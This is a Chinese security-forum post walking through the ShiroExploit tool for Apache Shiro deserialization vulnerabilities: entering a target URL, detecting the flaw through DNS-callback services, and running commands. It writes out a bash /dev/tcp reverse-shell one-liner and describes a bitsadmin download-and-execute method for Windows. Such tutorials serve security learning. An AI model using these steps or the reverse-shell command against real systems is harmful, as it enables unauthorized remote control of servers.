安全矩阵

 找回密码
 立即注册
搜索
查看: 4289|回复: 0

Shiro漏洞工具的使用

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-7-5 21:41:51 | 显示全部楼层 |阅读模式
本帖最后由 gclome 于 2020-7-5 21:43 编辑

原文链接:Shiro漏洞工具的使用

01 下载ShiroExploit.V2.3,并运行.jar
  • 在github上直接搜索下载
  • 有源码,可以自己编译成.jar





02 运行后的界面
  • Shiro550无需选择操作系统类型,
  • Shiro721需要选择操作系统类型
  • 复杂Http请求支持直接粘贴数据包




03输入测试的url
  • 可以自己直接输入被检测是否存在shire反序列漏洞的地址





04 选择检测方式
CEYE.IO
可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload

dnslog.cn

可以不进行任何配置,每次启动时程序会自动从 dnslog.cn 申请一个 DNS Record。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload
缺点:少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget,且 dnslog.cn 只会记录最近的10条 DNS 解析记录



05 判断是否存在漏洞的依据
  • 程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入
  • 当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令





06 反弹shell
  • 反弹shell(linux) 采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1 的方式反弹 shell
  • 反弹shell(Windows) 采用 bitsadmin 下载指定 URL 的 exe 文件并执行的方式获取 shell




参考链接:
https://github.com/feihong-cs/ShiroExploit免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

                                                                                                                                                                                                                                                                                                                                                                                 
  
      











回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-19 21:15 , Processed in 0.013213 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表